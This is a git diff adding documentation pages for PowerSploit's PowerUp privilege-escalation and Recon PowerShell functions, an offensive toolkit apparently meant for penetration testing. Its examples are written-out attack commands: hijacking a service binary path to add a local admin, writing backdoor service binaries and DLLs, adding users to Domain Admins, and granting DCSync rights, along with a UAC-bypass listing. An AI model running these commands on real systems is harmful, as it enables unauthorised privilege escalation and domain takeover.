+```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.ServiceBinary.Installed + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Set-ServiceBinaryPath.md b/docs/Privesc/Set-ServiceBinaryPath.md new file mode 100755 index 00000000..b39926fd --- /dev/null +++ b/docs/Privesc/Set-ServiceBinaryPath.md @@ -0,0 +1,92 @@ +# Set-ServiceBinaryPath + +## SYNOPSIS +Sets the binary path for a service to a specified value. + +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Set-ServiceBinaryPath [-Name] [-Path] +``` + +## DESCRIPTION +Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a +service handle to the service with ConfigControl access using the GetServiceHandle +Win32 API call. +ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath) +to the string value specified by binPath, and the handle is closed off. + +Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a +Dacl field to each object. +It does this by opening a handle with ReadControl for the +service with using the GetServiceHandle Win32 API call and then uses +QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add' +``` + +Sets the binary path for 'VulnSvc' to be a command to add a user. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add' +``` + +Sets the binary path for 'VulnSvc' to be a command to add a user. + +## PARAMETERS + +### -Name +An array of one or more service names to set the binary path for. +Required. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Path +The new binary path (lpBinaryPathName) to set for the specified service. +Required. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: BinaryPath, binPath + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.Boolean + +$True if configuration succeeds, $False otherwise. + +## NOTES + +## RELATED LINKS + +[https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx) + diff --git a/docs/Privesc/Test-ServiceDaclPermission.md b/docs/Privesc/Test-ServiceDaclPermission.md new file mode 100755 index 00000000..2251a116 --- /dev/null +++ b/docs/Privesc/Test-ServiceDaclPermission.md @@ -0,0 +1,112 @@ +# Test-ServiceDaclPermission + +## SYNOPSIS +Tests one or more passed services or service names against a given permission set, +returning the service objects where the current user have the specified permissions. + +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: Add-ServiceDacl + +## SYNTAX + +``` +Test-ServiceDaclPermission [-Name] [-Permissions ] [-PermissionSet ] +``` + +## DESCRIPTION +Takes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds +a service Dacl to the service object with Add-ServiceDacl. +All group SIDs for the current +user are enumerated services where the user has some type of permission are filtered. +The +services are then filtered against a specified set of permissions, and services where the +current user have the specified permissions are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-Service | Test-ServiceDaclPermission +``` + +Return all service objects where the current user can modify the service configuration. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service | Test-ServiceDaclPermission -PermissionSet 'Restart' +``` + +Return all service objects that the current user can restart. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Test-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC' +``` + +Return the VulnSVC object if the current user has start permissions. + +## PARAMETERS + +### -Name +An array of one or more service names to test against the specified permission set. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName, Service + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Permissions +A manual set of permission to test again. +One of:'QueryConfig', 'ChangeConfig', 'QueryStatus', +'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl', +'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity', +'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess' + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PermissionSet +A pre-defined permission set to test a specified service against. +'ChangeConfig', 'Restart', or 'AllAccess'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: ChangeConfig +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### ServiceProcess.ServiceController + +## NOTES + +## RELATED LINKS + +[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) + diff --git a/docs/Privesc/Write-HijackDll.md b/docs/Privesc/Write-HijackDll.md new file mode 100755 index 00000000..d38e3e73 --- /dev/null +++ b/docs/Privesc/Write-HijackDll.md @@ -0,0 +1,173 @@ +# Write-HijackDll + +## SYNOPSIS +Patches in the path to a specified .bat (containing the specified command) into a +pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Write-HijackDll [-DllPath] [[-Architecture] ] [[-BatPath] ] [[-UserName] ] + [[-Password] ] [[-LocalGroup] ] [[-Credential] ] [[-Command] ] +``` + +## DESCRIPTION +First builds a self-deleting .bat file that executes the specified -Command or local user, +to add and writes the.bat out to -BatPath. +The BatPath is then patched into a pre-compiled +C++ DLL that is built to be hijackable by the IKEEXT service. +There are two DLLs, one for +x86 and one for x64, and both are contained as base64-encoded strings. +The DLL is then +written out to the specified OutputFile. + +## EXAMPLES + +### Example 1 +``` +PS C:\> {{ Add example code here }} +``` + +{{ Add example description here }} + +## PARAMETERS + +### -DllPath +File name to write the generated DLL out to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Architecture +The Architecture to generate for the DLL, x86 or x64. +If not specified, PowerUp +will try to automatically determine the correct architecture. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -BatPath +Path to the .bat for the DLL to launch. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserName +The \[domain\\\]username to add. +If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +The password to set for the added user. +If not given, it defaults to "Password123!" + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: Password123! +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +Local group name to add the user to (default of 'Administrators'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object specifying the user/password to add. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Command +Custom command to execute instead of user creation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 8 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.HijackableDLL + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Write-ServiceBinary.md b/docs/Privesc/Write-ServiceBinary.md new file mode 100755 index 00000000..7d588a54 --- /dev/null +++ b/docs/Privesc/Write-ServiceBinary.md @@ -0,0 +1,191 @@ +# Write-ServiceBinary + +## SYNOPSIS +Patches in the specified command to a pre-compiled C# service executable and +writes the binary out to the specified ServicePath location. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Write-ServiceBinary [-Name] [-UserName ] [-Password ] [-LocalGroup ] + [-Credential ] [-Command ] [-Path ] +``` + +## DESCRIPTION +Takes a pre-compiled C# service binary and patches in the appropriate commands needed +for service abuse. +If a -UserName/-Password or -Credential is specified, the command +patched in creates a local user and adds them to the specified -LocalGroup, otherwise +the specified -Command is patched in. +The binary is then written out to the specified +-ServicePath. +Either -Name must be specified for the service, or a proper object from +Get-Service must be passed on the pipeline in order to patch in the appropriate service +name the binary will be running under. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Write-ServiceBinary -Name VulnSVC +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that +adds a local Administrator (john/Password123!). + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Write-ServiceBinary +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that +adds a local Administrator (john/Password123!). + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john' +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that adds +TESTLAB\john to the Administrators local group. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123! +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that +adds a local Administrator (backdoor/Password123!). + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Write-ServiceBinary -Name VulnSVC -Command "net ..." +``` + +Writes a service binary to service.exe in the local directory for VulnSVC that +executes a custom command. + +## PARAMETERS + +### -Name +The service name the EXE will be running under. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -UserName +The \[domain\\\]username to add. +If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +The password to set for the added user. +If not given, it defaults to "Password123!" + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Password123! +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +Local group name to add the user to (default of 'Administrators'). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object specifying the user/password to add. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Command +Custom command to execute instead of user creation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Path +Path to write the binary out to, defaults to 'service.exe' in the local directory. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: "$(Convert-Path .)\service.exe" +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.ServiceBinary + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Write-UserAddMSI.md b/docs/Privesc/Write-UserAddMSI.md new file mode 100755 index 00000000..cac959d3 --- /dev/null +++ b/docs/Privesc/Write-UserAddMSI.md @@ -0,0 +1,56 @@ +# Write-UserAddMSI + +## SYNOPSIS +Writes out a precompiled MSI installer that prompts for a user/group addition. +This function can be used to abuse Get-RegistryAlwaysInstallElevated. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Write-UserAddMSI [[-Path] ] +``` + +## DESCRIPTION +Writes out a precompiled MSI installer that prompts for a user/group addition. +This function can be used to abuse Get-RegistryAlwaysInstallElevated. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Write-UserAddMSI +``` + +Writes the user add MSI to the local directory. + +## PARAMETERS + +### -Path +{{Fill Path Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServiceName + +Required: False +Position: 1 +Default value: UserAdd.msi +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.UserAddMSI + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/index.md b/docs/Privesc/index.md new file mode 100644 index 00000000..836e6748 --- /dev/null +++ b/docs/Privesc/index.md @@ -0,0 +1,55 @@ +## PowerUp + +PowerUp aims to be a clearinghouse of common Windows privilege escalation +vectors that rely on misconfigurations. + +Running Invoke-AllChecks will output any identifiable vulnerabilities along +with specifications for any abuse functions. The -HTMLReport flag will also +generate a COMPUTER.username.html version of the report. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + + +### Token/Privilege Enumeration/Abuse: + Get-ProcessTokenGroup - returns all SIDs that the current token context is a part of, whether they are disabled or not + Get-ProcessTokenPrivilege - returns all privileges for the current (or specified) process ID + Enable-Privilege - enables a specific privilege for the current process + +### Service Enumeration/Abuse: + Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set + Get-UnquotedService - returns services with unquoted paths that also have a space in the name + Get-ModifiableServiceFile - returns services where the current user can write to the service binary path or its config + Get-ModifiableService - returns services the current user can modify + Get-ServiceDetail - returns detailed information about a specified service + Set-ServiceBinaryPath - sets the binary path for a service to a specified value + Invoke-ServiceAbuse - modifies a vulnerable service to create a local admin or execute a custom command + Write-ServiceBinary - writes out a patched C# service binary that adds a local admin or executes a custom command + Install-ServiceBinary - replaces a service binary with one that adds a local admin or executes a custom command + Restore-ServiceBinary - restores a replaced service binary with the original executable + +### DLL Hijacking: + Find-ProcessDLLHijack - finds potential DLL hijacking opportunities for currently running processes + Find-PathDLLHijack - finds service %PATH% DLL hijacking opportunities + Write-HijackDll - writes out a hijackable DLL + +### Registry Checks: + Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set + Get-RegistryAutoLogon - checks for Autologon credentials in the registry + Get-ModifiableRegistryAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns + +### Miscellaneous Checks: + Get-ModifiableScheduledTaskFile - find schtasks with modifiable target files + Get-UnattendedInstallFile - finds remaining unattended installation files + Get-Webconfig - checks for any encrypted web.config strings + Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords + Get-SiteListPassword - retrieves the plaintext passwords for any found McAfee's SiteList.xml files + Get-CachedGPPPassword - checks for passwords in cached Group Policy Preferences files + +### Other Helpers/Meta-Functions: + Get-ModifiablePath - tokenizes an input string and returns the files in it the current user can modify + Write-UserAddMSI - write out a MSI installer that prompts for a user to be added + Invoke-WScriptUACBypass - performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe + Invoke-PrivescAudit - runs all current escalation checks and returns a report (formerly Invoke-AllChecks) diff --git a/docs/Recon/Add-DomainGroupMember.md b/docs/Recon/Add-DomainGroupMember.md new file mode 100755 index 00000000..cc563e92 --- /dev/null +++ b/docs/Recon/Add-DomainGroupMember.md @@ -0,0 +1,142 @@ +# Add-DomainGroupMember + +## SYNOPSIS +Adds a domain user (or group) to an existing domain group, assuming +appropriate permissions to do so. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +## SYNTAX + +``` +Add-DomainGroupMember [-Identity] -Members [-Domain ] [-Credential ] +``` + +## DESCRIPTION +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified -GroupIdentity, +which returns a DirectoryServices.AccountManagement.GroupPrincipal object. +For +each entry in -Members, each member identity is similarly searched for and added +to the group. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' +``` + +Adds harmj0y to 'Domain Admins' in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred + +Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred + +Creates the 'andy' user with the specified description and password, using the specified +alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember +and the alternate credentials. + +## PARAMETERS + +### -Identity +A group SamAccountName (e.g. +Group1), DistinguishedName (e.g. +CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to add members to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: GroupName, GroupIdentity + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Members +One or more member identities, i.e. +SamAccountName (e.g. +Group1), DistinguishedName +(e.g. +CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), +or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202). + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: MemberIdentity, Member, DistinguishedName + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/) + diff --git a/docs/Recon/Add-DomainObjectAcl.md b/docs/Recon/Add-DomainObjectAcl.md new file mode 100755 index 00000000..c530e810 --- /dev/null +++ b/docs/Recon/Add-DomainObjectAcl.md @@ -0,0 +1,361 @@ +# Add-DomainObjectAcl + +## SYNOPSIS +Adds an ACL for a specific active directory object. + +AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906 + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +## SYNTAX + +``` +Add-DomainObjectAcl [[-TargetIdentity] ] [-TargetDomain ] [-TargetLDAPFilter ] + [-TargetSearchBase ] -PrincipalIdentity [-PrincipalDomain ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] [-Rights ] [-RightsGUID ] +``` + +## DESCRIPTION +This function modifies the ACL/ACE entries for a given Active Directory +target object specified by -TargetIdentity. +Available -Rights are +'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended +rights GUID can be set with -RightsGUID. +These rights are granted on the target +object for the specified -PrincipalIdentity. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid +``` + +Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid} + +... + +Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y))) +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string:(&(|(samAccountName=dfm.a))) +VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local +VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local + +Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid } + +AceQualifier : AccessAllowed +ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local +ActiveDirectoryRights : ExtendedRight +ObjectAceType : User-Force-Change-Password +ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114 +InheritanceFlags : None +BinaryLength : 56 +AceType : AccessAllowedObject +ObjectAceFlags : ObjectAceTypePresent +IsCallback : False +PropagationFlags : None +SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108 +AccessMask : 256 +AuditFlags : None +IsInherited : False +AceFlags : None +InheritedObjectAceType : All +OpaqueLength : 0 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid +``` + +Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid} + +\[no results returned\] + +$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose +VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain +VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y)))) +VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain +VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser)))) +VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local +VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local + +Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid } + +AceQualifier : AccessAllowed +ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local +ActiveDirectoryRights : ExtendedRight +ObjectAceType : User-Force-Change-Password +ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114 +InheritanceFlags : None +BinaryLength : 56 +AceType : AccessAllowedObject +ObjectAceFlags : ObjectAceTypePresent +IsCallback : False +PropagationFlags : None +SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108 +AccessMask : 256 +AuditFlags : None +IsInherited : False +AceFlags : None +InheritedObjectAceType : All +OpaqueLength : 0 + +## PARAMETERS + +### -TargetIdentity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain object to modify ACLs for. +Required. +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -TargetDomain +Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TargetLDAPFilter +Specifies an LDAP query string that is used to filter Active Directory object targets. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TargetSearchBase +The LDAP source to search through for targets, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PrincipalIdentity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain principal to add for the ACL. +Required. +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PrincipalDomain +Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Rights +Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'. +Defaults to 'All'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: All +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RightsGUID +Manual GUID representing the right to add to the target. + +```yaml +Type: Guid +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[https://adsecurity.org/?p=1906 +https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell](https://adsecurity.org/?p=1906 +https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell) + diff --git a/docs/Recon/Add-RemoteConnection.md b/docs/Recon/Add-RemoteConnection.md new file mode 100755 index 00000000..86112e24 --- /dev/null +++ b/docs/Recon/Add-RemoteConnection.md @@ -0,0 +1,114 @@ +# Add-RemoteConnection + +## SYNOPSIS +Pseudo "mounts" a connection to a remote path using the specified +credential object, allowing for access of remote resources. +If a -Path isn't +specified, a -ComputerName is required to pseudo-mount IPC$. + +Author: Will Schroeder 